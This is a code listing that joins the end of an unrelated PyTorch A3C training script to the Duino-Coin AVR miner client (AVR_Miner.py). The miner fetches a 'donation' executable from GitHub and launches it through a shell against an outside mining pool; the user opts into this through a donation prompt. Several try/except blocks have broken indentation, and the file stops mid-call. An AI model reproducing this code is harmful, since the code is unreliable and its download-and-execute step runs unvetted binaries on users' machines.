    # the same parameters (Hogwild-style, per the reference linked above).
    shared_model = ActorCritic(
        env.observation_space.shape[2], env.action_space)
    shared_model.share_memory()
    if args.no_shared:
        optimizer = None
    else:
        # Shared Adam statistics so workers contribute to one optimizer state.
        optimizer = my_optim.SharedAdam(shared_model.parameters(), lr=args.lr)
        optimizer.share_memory()
    processes = []
    # Global step counter shared across processes; lock guards its updates.
    counter = mp.Value('i', 0)
    lock = mp.Lock()
    # Evaluation process. NOTE(review): it receives args.num_processes in the
    # position where train workers receive a rank — confirm test()'s signature.
    p = mp.Process(target=test, args=(args.num_processes, args, shared_model, counter))
    p.start()
    processes.append(p)
    for rank in range(0, args.num_processes):
        p = mp.Process(target=train, args=(rank, args, shared_model, counter, lock, optimizer))
        p.start()
        processes.append(p)
    # Block until every worker (and the evaluator) exits.
    for p in processes:
        p.join()
|
AVR_Miner.py | #!/usr/bin/env python3
##########################################
# Duino-Coin Python AVR Miner (v2.5.1)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path
from os import system as ossystem
from platform import processor as osprocessor
from pathlib import Path
from platform import system
from re import sub
from signal import SIGINT, signal
from socket import socket
from subprocess import DEVNULL, Popen, check_call, call
from threading import Thread as thrThread
from threading import Lock
from time import ctime, sleep, strptime, time
from statistics import mean
import pip
def install(package):
    """Install *package* with pip, then restart the miner so the freshly
    installed dependency can be imported.

    Invokes ``python -m pip install`` in a subprocess — the only supported
    way of driving pip programmatically. The previous primary path called
    ``pip.main``, an internal API that was removed in pip >= 10 (the old
    AttributeError fallback already did exactly this call).

    :param package: name of the PyPI package to install
    """
    check_call([sys.executable, '-m', 'pip', 'install', package])
    # Re-exec this script so the new package is picked up on import.
    call([sys.executable, __file__])
def now():
    """Return the current local time as a :class:`datetime.datetime`."""
    return datetime.now()
try:
# Check if pyserial is installed
from serial import Serial
import serial.tools.list_ports
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Pyserial is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "pyserial" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('pyserial')
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Colorama is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "colorama" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('colorama')
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Requests is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "requests" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('requests')
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Pypresence is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "pypresence" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('pypresence')
# Global variables
MINER_VER = '2.51'  # Version number
SOC_TIMEOUT = 60  # server socket timeout, seconds
AVR_TIMEOUT = 4  # diff 8(*100) / 196 H/s ~= 4
BAUDRATE = 115200  # serial speed used to talk to the AVR board
RESOURCES_DIR = 'AVRMiner_' + str(MINER_VER) + '_resources'
# shares[0] = accepted shares, shares[1] = rejected shares
shares = [0, 0]
hashrate_mean = []
diff = 0
donator_running = False
job = ''
debug = 'n'
discord_presence = 'y'
rig_identifier = 'None'
# Serverip file
server_ip_file = ('https://raw.githubusercontent.com/'
                  + 'revoxhere/'
                  + 'duino-coin/gh-pages/serverip.txt')
donation_level = 0
hashrate = 0
config = ConfigParser()
thread_lock = Lock()  # serializes console output across mining threads
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
    mkdir(RESOURCES_DIR)
# Check if languages file exists; if not, download it from GitHub
if not Path(RESOURCES_DIR + '/langs.json').is_file():
    url = ('https://raw.githubusercontent.com/'
           + 'revoxhere/'
           + 'duino-coin/master/Resources/'
           + 'AVR_Miner_langs.json')
    r = requests.get(url)
    with open(RESOURCES_DIR + '/langs.json', 'wb') as f:
        f.write(r.content)
# Load language file
# NOTE: lang_file is deliberately rebound from the file handle to the parsed
# JSON dict; get_string() reads this dict afterwards.
with open(RESOURCES_DIR + '/langs.json', 'r', encoding='utf8') as lang_file:
    lang_file = jsonload(lang_file)
# OS X invalid locale hack
if system() == 'Darwin':
    if getlocale()[0] is None:
        setlocale(LC_ALL, 'en_US.UTF-8')
# Check if miner is configured, if it isn't, autodetect language
try:
    if not Path(RESOURCES_DIR + '/Miner_config.cfg').is_file():
        locale = getdefaultlocale()[0]
        if locale.startswith('es'):
            lang = 'spanish'
        elif locale.startswith('sk'):
            lang = 'slovak'
        elif locale.startswith('ru'):
            lang = 'russian'
        elif locale.startswith('pl'):
            lang = 'polish'
        elif locale.startswith('fr'):
            lang = 'french'
        elif locale.startswith('tr'):
            lang = 'turkish'
        elif locale.startswith('pt'):
            lang = 'portugese'
        elif locale.startswith('zh'):
            lang = 'chinese_simplified'
        else:
            lang = 'english'
    else:
        try:
            # Read language from configfile
            config.read(RESOURCES_DIR + '/Miner_config.cfg')
            lang = config['Duino-Coin-AVR-Miner']['language']
        except Exception:
            # If it fails, fallback to english
            lang = 'english'
except:
    lang = 'english'
def get_string(string_name):
    """Look up a UI string in the active language, falling back to the
    English table, then to a visible 'not found' marker."""
    for lang_key in (lang, 'english'):
        translations = lang_file[lang_key]
        if string_name in translations:
            return translations[string_name]
    return 'String not found: ' + string_name
def debug_output(text):
    """Print a timestamped DEBUG line, but only when debug mode is on."""
    if debug != 'y':
        return
    timestamp = now().strftime(Style.DIM + '%H:%M:%S.%f ')
    print(Style.RESET_ALL + timestamp + 'DEBUG: ' + str(text))
def title(title):
    """Set the terminal window title (cmd `title` on Windows, the xterm
    escape sequence everywhere else)."""
    if osname != 'nt':
        # Most standard terminals understand the OSC 0 escape
        print('\33]0;' + title + '\a', end='')
        sys.stdout.flush()
    else:
        # Windows systems
        ossystem('title ' + title)
def connect():
    # Server connection
    # Loop until a TCP connection to (server_ip, server_port) succeeds and
    # the server's version handshake is read; returns the connected socket.
    global server_ip
    global server_port
    serverVersion = 0
    while True:
        try:
            try:
                # NOTE(review): this calls close() on the socket *class*,
                # not on an instance, so it always raises and is swallowed
                # below - no previous connection is actually closed here.
                socket.close()
            except Exception:
                pass
            debug_output('Connecting to '
                         + str(server_ip)
                         + str(':')
                         + str(server_port))
            soc = socket()
            soc.settimeout(SOC_TIMEOUT)
            # Establish socket connection to the server
            soc.connect(
                (str(server_ip),
                 int(server_port)))
            # Get server version (first bytes the server sends)
            serverVersion = soc.recv(10).decode().rstrip('\n')
            debug_output('Server version: ' + serverVersion)
            if float(serverVersion) <= float(MINER_VER):
                # If miner is up-to-date, display a message and continue
                pretty_print(
                    'net0',
                    get_string('connected')
                    + Style.NORMAL
                    + Fore.RESET
                    + get_string('connected_server')
                    + str(serverVersion)
                    + ')',
                    'success')
                break
            else:
                # Server is newer than the miner: warn but keep mining
                pretty_print(
                    'sys0',
                    ' Miner is outdated (v'
                    + MINER_VER
                    + ') -'
                    + get_string('server_is_on_version')
                    + serverVersion
                    + Style.NORMAL
                    + Fore.RESET
                    + get_string('update_warning'),
                    'warning')
                sleep(10)
                break
        except Exception as e:
            pretty_print(
                'net0',
                get_string('connecting_error')
                + Style.NORMAL
                + ' ('
                + str(e)
                + ')',
                'error')
            debug_output('Connection error: ' + str(e))
            sleep(10)
    return soc
def handler(signal_received, frame):
    # SIGINT handler: print a goodbye message and hard-exit the process.
    pretty_print(
        'sys0',
        get_string('sigint_detected')
        + Style.NORMAL
        + Fore.RESET
        + get_string('goodbye'),
        'warning')
    try:
        # Close previous socket connection (if any)
        # NOTE(review): socket here is the class, not an instance, so this
        # always raises and the except swallows it - nothing is closed.
        socket.close()
    except Exception:
        pass
    # _exit skips cleanup handlers; appropriate since threads may be blocked
    _exit(0)


# Enable signal handler
signal(SIGINT, handler)
def load_config():
    """Load miner settings from Miner_config.cfg, or interactively create
    the config on first run.

    Populates the module-level settings: username, avrport (list of serial
    port names), donation_level, debug, rig_identifier, SOC_TIMEOUT,
    AVR_TIMEOUT and discord_presence.
    """
    # Config loading section
    global username
    global donation_level
    global avrport
    global debug
    global rig_identifier
    # BUG FIX: these were previously assigned as function locals, so the
    # values stored in the config file never took effect at module level.
    global SOC_TIMEOUT
    global AVR_TIMEOUT
    global discord_presence
    # Initial configuration section (first run, no config file yet)
    if not Path(str(RESOURCES_DIR) + '/Miner_config.cfg').is_file():
        print(
            Style.BRIGHT
            + get_string('basic_config_tool')
            + RESOURCES_DIR
            + get_string('edit_config_file_warning'))
        print(
            Style.RESET_ALL
            + get_string('dont_have_account')
            + Fore.YELLOW
            + get_string('wallet')
            + Fore.RESET
            + get_string('register_warning'))
        username = input(
            Style.RESET_ALL
            + Fore.YELLOW
            + get_string('ask_username')
            + Fore.RESET
            + Style.BRIGHT)
        # List the serial ports the user can pick from
        print(Style.RESET_ALL
              + Fore.YELLOW
              + get_string('ports_message'))
        portlist = serial.tools.list_ports.comports(include_links=True)
        for port in portlist:
            print(Style.RESET_ALL
                  + Style.BRIGHT
                  + Fore.RESET
                  + ' '
                  + str(port))
        print(Style.RESET_ALL
              + Fore.YELLOW
              + get_string('ports_notice'))
        port_names = [port.device for port in portlist]
        # Build a comma-separated list of ports, validating each entry
        avrport = ''
        while True:
            current_port = input(
                Style.RESET_ALL
                + Fore.YELLOW
                + get_string('ask_avrport')
                + Fore.RESET
                + Style.BRIGHT)
            if current_port in port_names:
                avrport += current_port
                confirmation = input(
                    Style.RESET_ALL
                    + Fore.YELLOW
                    + get_string('ask_anotherport')
                    + Fore.RESET
                    + Style.BRIGHT)
                if confirmation == 'y' or confirmation == 'Y':
                    avrport += ','
                else:
                    break
            else:
                print(Style.RESET_ALL
                      + Fore.RED
                      + 'Please enter a valid COM port from the list above')
        rig_identifier = input(
            Style.RESET_ALL
            + Fore.YELLOW
            + get_string('ask_rig_identifier')
            + Fore.RESET
            + Style.BRIGHT)
        if rig_identifier == 'y' or rig_identifier == 'Y':
            rig_identifier = input(
                Style.RESET_ALL
                + Fore.YELLOW
                + get_string('ask_rig_name')
                + Fore.RESET
                + Style.BRIGHT)
        else:
            rig_identifier = 'None'
        donation_level = '0'
        if osname == 'nt' or osname == 'posix':
            donation_level = input(
                Style.RESET_ALL
                + Fore.YELLOW
                + get_string('ask_donation_level')
                + Fore.RESET
                + Style.BRIGHT)
        # Check whether donation_level is correct: strip non-digits, then
        # clamp to the supported 0..5 range (empty input defaults to 1)
        donation_level = sub(r'\D', '', donation_level)
        if donation_level == '':
            donation_level = 1
        if float(donation_level) > int(5):
            donation_level = 5
        if float(donation_level) < int(0):
            donation_level = 0
        # Format data
        config['Duino-Coin-AVR-Miner'] = {
            'username': username,
            'avrport': avrport,
            'donate': donation_level,
            'language': lang,
            'identifier': rig_identifier,
            'debug': 'n',
            "soc_timeout": 60,
            "avr_timeout": 4,
            "discord_presence": "y"}
        # Write data to file
        with open(str(RESOURCES_DIR)
                  + '/Miner_config.cfg', 'w') as configfile:
            config.write(configfile)
        avrport = avrport.split(',')
        print(Style.RESET_ALL + get_string('config_saved'))
    else:  # If config already exists, load from it
        config.read(str(RESOURCES_DIR) + '/Miner_config.cfg')
        username = config['Duino-Coin-AVR-Miner']['username']
        avrport = config['Duino-Coin-AVR-Miner']['avrport']
        avrport = avrport.replace(" ", "").split(',')
        donation_level = config['Duino-Coin-AVR-Miner']['donate']
        debug = config['Duino-Coin-AVR-Miner']['debug']
        rig_identifier = config['Duino-Coin-AVR-Miner']['identifier']
        # ConfigParser returns strings; convert the timeouts so they are
        # valid for socket.settimeout() and Serial(timeout=...)
        SOC_TIMEOUT = int(config["Duino-Coin-AVR-Miner"]["soc_timeout"])
        # BUG FIX: previously read the "soc_timeout" key (copy-paste error)
        AVR_TIMEOUT = int(config["Duino-Coin-AVR-Miner"]["avr_timeout"])
        discord_presence = config["Duino-Coin-AVR-Miner"]["discord_presence"]
def greeting():
    # greeting message depending on time
    # Prints the startup banner (version, translation credit, ports,
    # donation level, algorithm, rig id) and, when donating, pre-downloads
    # the platform-specific donation executable.
    # NOTE(review): `global greeting` rebinds the function's own name to a
    # string after the first call - the function is only ever called once.
    global greeting
    print(Style.RESET_ALL)
    current_hour = strptime(ctime(time())).tm_hour
    if current_hour < 12:
        greeting = get_string('greeting_morning')
    elif current_hour == 12:
        greeting = get_string('greeting_noon')
    elif current_hour > 12 and current_hour < 18:
        greeting = get_string('greeting_afternoon')
    elif current_hour >= 18:
        greeting = get_string('greeting_evening')
    else:
        greeting = get_string('greeting_back')
    # Startup message
    print(
        Style.DIM
        + Fore.MAGENTA
        + ' ‖ '
        + Fore.YELLOW
        + Style.BRIGHT
        + get_string('banner')
        + Style.RESET_ALL
        + Fore.MAGENTA
        + ' (v'
        + str(MINER_VER)
        + ') '
        + Fore.RESET
        + '2019-2021')
    print(
        Style.DIM
        + Fore.MAGENTA
        + ' ‖ '
        + Style.NORMAL
        + Fore.MAGENTA
        + 'https://github.com/revoxhere/duino-coin')
    # Credit the translator when a non-English language is active
    if lang != "english":
        print(
            Style.DIM
            + Fore.MAGENTA
            + " ‖ "
            + Style.NORMAL
            + Fore.RESET
            + lang.capitalize()
            + " translation: "
            + Fore.MAGENTA
            + get_string("translation_autor"))
    print(
        Style.DIM
        + Fore.MAGENTA
        + ' ‖ '
        + Style.NORMAL
        + Fore.RESET
        + get_string('avr_on_port')
        + Style.BRIGHT
        + Fore.YELLOW
        + ' '.join(avrport))
    if osname == 'nt' or osname == 'posix':
        print(
            Style.DIM
            + Fore.MAGENTA
            + ' ‖ '
            + Style.NORMAL
            + Fore.RESET
            + get_string('donation_level')
            + Style.BRIGHT
            + Fore.YELLOW
            + str(donation_level))
    print(
        Style.DIM
        + Fore.MAGENTA
        + ' ‖ '
        + Style.NORMAL
        + Fore.RESET
        + get_string('algorithm')
        + Style.BRIGHT
        + Fore.YELLOW
        + 'DUCO-S1A @ AVR diff')
    if rig_identifier != "None":
        print(
            Style.DIM
            + Fore.MAGENTA
            + ' ‖ '
            + Style.NORMAL
            + Fore.RESET
            + get_string('rig_identifier')
            + Style.BRIGHT
            + Fore.YELLOW
            + rig_identifier)
    print(
        Style.DIM
        + Fore.MAGENTA
        + ' ‖ '
        + Style.NORMAL
        + Fore.RESET
        + str(greeting)
        + ', '
        + Style.BRIGHT
        + Fore.YELLOW
        + str(username)
        + '!\n')
    # Download the donation executable once, if the user opted to donate
    if int(donation_level) > 0:
        if osname == 'nt':
            # Initial miner executable section
            if not Path(RESOURCES_DIR + '/Donate_executable.exe').is_file():
                url = ('https://github.com/'
                       + 'revoxhere/'
                       + 'duino-coin/blob/useful-tools/'
                       + 'donateExecutableWindows.exe?raw=true')
                r = requests.get(url)
                with open(RESOURCES_DIR + '/Donate_executable.exe', 'wb') as f:
                    f.write(r.content)
        elif osname == "posix":
            # Pick the binary matching the CPU architecture
            if osprocessor() == "aarch64":
                url = ("https://github.com/revoxhere/"
                       + "duino-coin/blob/useful-tools/Donate_executables/"
                       + "DonateExecutableAARCH64?raw=true")
            else:
                url = ("https://github.com/revoxhere/"
                       + "duino-coin/blob/useful-tools/Donate_executables/"
                       + "DonateExecutableLinux?raw=true")
            if not Path(RESOURCES_DIR + "/Donate_executable").is_file():
                r = requests.get(url)
                with open(RESOURCES_DIR + "/Donate_executable", "wb") as f:
                    f.write(r.content)
def donate():
    """Start the background donation miner according to donation_level,
    or print the donation plea when the level is zero."""
    global donation_level
    global donator_running
    global donateExecutable
    if osname == 'nt':
        cmd = (
            'cd '
            + RESOURCES_DIR
            + '& Donate_executable.exe '
            + '-o stratum+tcp://xmg.minerclaim.net:7008 '
            + '-u revox.donate '
            + '-p x -s 4 -e ')
    elif osname == 'posix':
        cmd = (
            'cd '
            + RESOURCES_DIR
            + '&& chmod +x Donate_executable '
            + '&& ./Donate_executable '
            + '-o stratum+tcp://xmg.minerclaim.net:7008 '
            + '-u revox.donate '
            + '-p x -s 4 -e ')
    level = int(donation_level)
    if level <= 0:
        # No donation: remind the user the network is free to use
        pretty_print(
            'sys0',
            Fore.YELLOW
            + get_string('free_network_warning')
            + get_string('donate_warning')
            + Fore.GREEN
            + 'https://duinocoin.com/donate'
            + Fore.YELLOW
            + get_string('learn_more_donate'),
            'warning')
        sleep(5)
    elif not donator_running:
        # Map donation level 1..5 to the executable's intensity argument;
        # anything else appends nothing (same as the original elif chain)
        cmd += {1: '10', 2: '20', 3: '30', 4: '40', 5: '50'}.get(level, '')
        if level > 0:
            debug_output(get_string('starting_donation'))
            donator_running = True
            # Launch CMD as subprocess
            donateExecutable = Popen(
                cmd, shell=True, stderr=DEVNULL)
            pretty_print(
                'sys0',
                get_string('thanks_donation'),
                'warning')
def init_rich_presence():
    # Initialize Discord rich presence
    # Connects to a locally running Discord client; failures are swallowed
    # so the miner works fine without Discord.
    global RPC
    try:
        # Duino-Coin Discord application id
        RPC = Presence(808056068113563701)
        RPC.connect()
        debug_output('Discord rich presence initialized')
    except Exception:
        # Discord not launched
        pass
def update_rich_presence():
    # Update rich presence status
    # Endless background loop: pushes hashrate and share counters to the
    # Discord client every 15 seconds.
    startTime = int(time())
    while True:
        try:
            RPC.update(
                details='Hashrate: ' + str(hashrate) + ' H/s',
                start=startTime,
                state='Acc. shares: '
                + str(shares[0])
                + '/'
                + str(shares[0] + shares[1]),
                large_image='ducol',
                large_text='Duino-Coin, '
                + 'a coin that can be mined with almost everything, '
                + 'including AVR boards',
                buttons=[
                    {'label': 'Learn more',
                     'url': 'https://duinocoin.com'},
                    {'label': 'Discord Server',
                     'url': 'https://discord.gg/k48Ht5y'}])
        except Exception:
            # Discord not launched
            pass
        # 15 seconds to respect Discord's rate limit
        sleep(15)
def pretty_print(message_type, message, state):
    """Print a colored, timestamped status line in the DUCO 'standard'.

    message_type selects the badge background (net* blue, usb* magenta,
    anything else green); state selects the text color (success green,
    warning yellow, anything else red).
    """
    if message_type.startswith('net'):
        background = Back.BLUE
    elif message_type.startswith('usb'):
        background = Back.MAGENTA
    else:
        background = Back.GREEN
    color = {
        'success': Fore.GREEN,
        'warning': Fore.YELLOW,
    }.get(state, Fore.RED)
    timestamp = now().strftime(Style.DIM + '%H:%M:%S ')
    line = (Style.RESET_ALL
            + Fore.WHITE
            + timestamp
            + Style.BRIGHT
            + background
            + ' '
            + message_type
            + ' '
            + Back.RESET
            + color
            + Style.BRIGHT
            + message
            + Style.NORMAL
            + Fore.RESET)
    # Hold the lock so lines from different mining threads don't interleave
    with thread_lock:
        print(line)
def mine_avr(com):
    # Mining section
    # One thread per AVR board: fetch a job from the server, forward it over
    # the serial port `com`, read the board's result, submit it, and print
    # the accepted/block/rejected share line. Loops forever.
    global hashrate
    global server_ip
    global server_port
    errorCounter = 0  # NOTE(review): never used
    while True:
        # Grab server IP and port
        while True:
            try:
                # Use request to grab data from raw github file
                res = requests.get(server_ip_file, data=None)
                if res.status_code == 200:
                    # Read content and split into lines
                    content = (res.content.decode().splitlines())
                    server_ip = content[0]  # Line 1 = pool address
                    server_port = 2814  # content[1] # Line 2 = pool port
                    debug_output(
                        'Retrieved pool IP: '
                        + server_ip
                        + ':'
                        + str(server_port))
                    # Connect to the server
                    soc = connect()
                    break
            except Exception as e:
                # If there was an error with grabbing data from GitHub
                pretty_print(
                    'net'
                    + str(''.join(filter(str.isdigit, com))),
                    get_string('data_error')
                    + Style.NORMAL
                    + Fore.RESET
                    + ' (git err: '
                    + str(e)
                    + ')',
                    'error')
                debug_output('GitHub error: ' + str(e))
                sleep(10)
        pretty_print(
            'sys'
            + str(''.join(filter(str.isdigit, com))),
            get_string('mining_start')
            + Style.NORMAL
            + Fore.RESET
            + get_string('mining_algorithm')
            + str(com)
            + ')',
            'success')
        while True:
            # Job-request loop: retry until a job with a numeric difficulty
            # (job[2]) arrives; anything else is a server text message
            while True:
                try:
                    # Send job request
                    debug_output(com + ': requested job from the server')
                    soc.sendall(
                        bytes(
                            'JOB,'
                            + str(username)
                            + ',AVR',
                            encoding='utf8'))
                    # Retrieve work
                    job = soc.recv(128).decode().rstrip("\n")
                    job = job.split(",")
                    debug_output("Received: " + str(job))
                    try:
                        diff = int(job[2])
                        debug_output(str(''.join(filter(str.isdigit, com)))
                                     + "Correct job received")
                        break
                    except:
                        pretty_print("usb"
                                     + str(''.join(filter(str.isdigit, com))),
                                     " Server message: "
                                     + job[1],
                                     "warning")
                        sleep(3)
                except Exception as e:
                    pretty_print(
                        'net'
                        + str(''.join(filter(str.isdigit, com))),
                        get_string('connecting_error')
                        + Style.NORMAL
                        + Fore.RESET
                        + ' (net err: '
                        + str(e)
                        + ')',
                        'error')
                    debug_output('Connection error: ' + str(e))
                    sleep(5)
                    soc = connect()
            while True:
                # (Re)open the serial connection to the AVR board
                while True:
                    try:
                        ser.close()
                    except:
                        pass
                    try:
                        ser = Serial(com,
                                     baudrate=BAUDRATE,
                                     timeout=AVR_TIMEOUT)
                        break
                    except Exception as e:
                        pretty_print(
                            'usb'
                            + str(''.join(filter(str.isdigit, com))),
                            get_string('board_connection_error')
                            + str(com)
                            + get_string('board_connection_error2')
                            + Style.NORMAL
                            + Fore.RESET
                            + ' (port connection err: '
                            + str(e)
                            + ')',
                            'error')
                        sleep(10)
                while True:
                    # Send the job to the board and read the result back,
                    # retrying up to 3 times on empty/garbled serial data
                    retry_counter = 0
                    while True:
                        if retry_counter >= 3:
                            break
                        try:
                            debug_output(com + ': sending job to AVR')
                            ser.write(
                                bytes(
                                    str(
                                        job[0]
                                        + ',' + job[1]
                                        + ',' + job[2]
                                        + ','), encoding='utf8'))
                            debug_output(com + ': reading result from AVR')
                            result = ser.read_until(b'\n').decode().strip()
                            ser.flush()
                            if "\x00" in result or not result:
                                raise Exception("Empty data received")
                            debug_output(com + ': retrieved result: '
                                         + str(result)
                                         + ' len: '
                                         + str(len(result)))
                            result = result.split(',')
                            try:
                                if result[0] and result[1]:
                                    break
                            except Exception as e:
                                debug_output(
                                    com + ': retrying reading data: ' + str(e))
                                retry_counter += 1
                        except Exception as e:
                            debug_output(
                                com + ': retrying sending data: ' + str(e))
                            retry_counter += 1
                    try:
                        # result = [nonce, elapsed microseconds, chip id]
                        debug_output(
                            com + ': received result (' + str(result[0]) + ')')
                        debug_output(
                            com + ': received time (' + str(result[1]) + ')')
                        # Convert AVR time to seconds
                        computetime = round(int(result[1]) / 1000000, 3)
                        if computetime < 1:
                            computetime = str(int(computetime * 1000)) + "ms"
                        else:
                            computetime = str(round(computetime, 2)) + "s"
                        # Calculate hashrate
                        hashrate_t = round(
                            int(result[0]) * 1000000 / int(result[1]), 2)
                        hashrate_mean.append(hashrate_t)
                        # Get average from the last hashrate measurements
                        hashrate = hashrate_t  # mean(hashrate_mean[-5:])
                        debug_output(
                            com +
                            ': calculated hashrate (' + str(hashrate_t) + ')'
                            + ' (avg:' + str(hashrate) + ')')
                        try:
                            chipID = result[2]
                            debug_output(
                                com + ': chip ID: ' + str(result[2]))
                            """ Check if chipID got received, this is
                            of course just a fraction of what's
                            happening on the server with it """
                            if not chipID.startswith('DUCOID'):
                                raise Exception('Wrong chipID string')
                        except Exception:
                            pretty_print(
                                'usb'
                                + str(''.join(filter(str.isdigit, com))),
                                ' Possible incorrect chip ID!'
                                + Style.NORMAL
                                + Fore.RESET
                                + ' This will cause problems with the future'
                                + ' release of Kolka security system',
                                'warning')
                            chipID = 'None'
                        break
                    except Exception as e:
                        pretty_print(
                            'usb'
                            + str(''.join(filter(str.isdigit, com))),
                            get_string('mining_avr_connection_error')
                            + Style.NORMAL
                            + Fore.RESET
                            + ' (error reading result from the board: '
                            + str(e)
                            + ', please check connection and port setting)',
                            'warning')
                        debug_output(
                            com + ': error splitting data: ' + str(e))
                        sleep(1)
                try:
                    # Send result to the server
                    soc.sendall(
                        bytes(
                            str(result[0])
                            + ','
                            + str(hashrate)
                            + ',Official AVR Miner (DUCO-S1A) v'
                            + str(MINER_VER)
                            + ','
                            + str(rig_identifier)
                            + ','
                            + str(chipID),
                            encoding='utf8'))
                except Exception as e:
                    pretty_print(
                        'net'
                        + str(''.join(filter(str.isdigit, com))),
                        get_string('connecting_error')
                        + Style.NORMAL
                        + Fore.RESET
                        + ' ('
                        + str(e)
                        + ')',
                        'error')
                    debug_output(com + ': connection error: ' + str(e))
                    sleep(5)
                    soc = connect()
                while True:
                    # Wait for the server's verdict and measure the ping
                    try:
                        responsetimetart = now()
                        feedback = soc.recv(64).decode().rstrip('\n')
                        responsetimestop = now()
                        time_delta = (responsetimestop -
                                      responsetimetart).microseconds
                        ping = round(time_delta / 1000)
                        debug_output(com + ': feedback: '
                                     + str(feedback)
                                     + ' with ping: '
                                     + str(ping))
                        break
                    except Exception as e:
                        pretty_print(
                            'net'
                            + str(''.join(filter(str.isdigit, com))),
                            get_string('connecting_error')
                            + Style.NORMAL
                            + Fore.RESET
                            + ' (err parsing response: '
                            + str(e)
                            + ')',
                            'error')
                        debug_output(com + ': error parsing response: '
                                     + str(e))
                        sleep(5)
                        soc = connect()
                if feedback == 'GOOD':
                    # If result was correct
                    shares[0] += 1
                    title(
                        get_string('duco_avr_miner')
                        + str(MINER_VER)
                        + ') - '
                        + str(shares[0])
                        + '/'
                        + str(shares[0] + shares[1])
                        + get_string('accepted_shares'))
                    with thread_lock:
                        print(
                            Style.RESET_ALL
                            + Fore.WHITE
                            + now().strftime(Style.DIM + '%H:%M:%S ')
                            + Style.BRIGHT
                            + Back.MAGENTA
                            + Fore.RESET
                            + ' usb'
                            + str(''.join(filter(str.isdigit, com)))
                            + ' '
                            + Back.RESET
                            + Fore.GREEN
                            + ' ⛏'
                            + get_string('accepted')
                            + Fore.RESET
                            + str(int(shares[0]))
                            + '/'
                            + str(int(shares[0] + shares[1]))
                            + Fore.YELLOW
                            + ' ('
                            + str(int((shares[0]
                                       / (shares[0] + shares[1]) * 100)))
                            + '%)'
                            + Style.NORMAL
                            + Fore.RESET
                            + ' ∙ '
                            + Fore.BLUE
                            + Style.BRIGHT
                            + str(round(hashrate))
                            + ' H/s'
                            + Style.NORMAL
                            + ' ('
                            + computetime
                            + ')'
                            + Fore.RESET
                            + ' ⚙ diff '
                            + str(diff)
                            + ' ∙ '
                            + Fore.CYAN
                            + 'ping '
                            + str('%02.0f' % int(ping))
                            + 'ms')
                elif feedback == 'BLOCK':
                    # If block was found
                    shares[0] += 1
                    title(
                        get_string('duco_avr_miner')
                        + str(MINER_VER)
                        + ') - '
                        + str(shares[0])
                        + '/'
                        + str(shares[0] + shares[1])
                        + get_string('accepted_shares'))
                    with thread_lock:
                        print(
                            Style.RESET_ALL
                            + Fore.WHITE
                            + now().strftime(Style.DIM + '%H:%M:%S ')
                            + Style.BRIGHT
                            + Back.MAGENTA
                            + Fore.RESET
                            + ' usb'
                            + str(''.join(filter(str.isdigit, com)))
                            + ' '
                            + Back.RESET
                            + Fore.CYAN
                            + ' ⛏'
                            + get_string('block_found')
                            + Fore.RESET
                            + str(int(shares[0]))
                            + '/'
                            + str(int(shares[0] + shares[1]))
                            + Fore.YELLOW
                            + ' ('
                            + str(int((shares[0]
                                       / (shares[0] + shares[1]) * 100)))
                            + '%)'
                            + Style.NORMAL
                            + Fore.RESET
                            + ' ∙ '
                            + Fore.BLUE
                            + Style.BRIGHT
                            + str(round(hashrate))
                            + ' H/s'
                            + Style.NORMAL
                            + ' ('
                            + computetime
                            + ')'
                            + Fore.RESET
                            + ' ⚙ diff '
                            + str(diff)
                            + ' ∙ '
                            + Fore.CYAN
                            + 'ping '
                            + str('%02.0f' % int(ping))
                            + 'ms')
                else:
                    # If result was incorrect
                    shares[1] += 1
                    title(
                        get_string('duco_avr_miner')
                        + str(MINER_VER)
                        + ') - '
                        + str(shares[0])
                        + '/'
                        + str(shares[0] + shares[1])
                        + get_string('accepted_shares'))
                    with thread_lock:
                        print(
                            Style.RESET_ALL
                            + Fore.WHITE
                            + now().strftime(Style.DIM + '%H:%M:%S ')
                            + Style.BRIGHT
                            + Back.MAGENTA
                            + Fore.RESET
                            + ' usb'
                            + str(''.join(filter(str.isdigit, com)))
                            + ' '
                            + Back.RESET
                            + Fore.RED
                            + ' ⛏'
                            + get_string('rejected')
                            + Fore.RESET
                            + str(int(shares[0]))
                            + '/'
                            + str(int(shares[0] + shares[1]))
                            + Fore.YELLOW
                            + ' ('
                            + str(int((shares[0]
                                       / (shares[0] + shares[1]) * 100)))
                            + '%)'
                            + Style.NORMAL
                            + Fore.RESET
                            + ' ∙ '
                            + Fore.BLUE
                            + Style.BRIGHT
                            + str(round(hashrate))
                            + ' H/s'
                            + Style.NORMAL
                            + ' ('
                            + computetime
                            + ')'
                            + Fore.RESET
                            + ' ⚙ diff '
                            + str(diff)
                            + ' ∙ '
                            + Fore.CYAN
                            + 'ping '
                            + str('%02.0f' % int(ping))
                            + 'ms')
                # One share done: go back to request the next job
                break
if __name__ == '__main__':
    # Unicode fix for windows
    if osname == "nt":
        ossystem("chcp 65001")
    # Colorama
    init(autoreset=True)
    # Window title
    title(get_string('duco_avr_miner') + str(MINER_VER) + ')')
    try:
        # Load config file or create new one
        load_config()
        debug_output('Config file loaded')
    except Exception as e:
        pretty_print(
            'sys0',
            get_string('load_config_error')
            + RESOURCES_DIR
            + get_string('load_config_error_warning')
            + Style.NORMAL
            + Fore.RESET
            + ' ('
            + str(e)
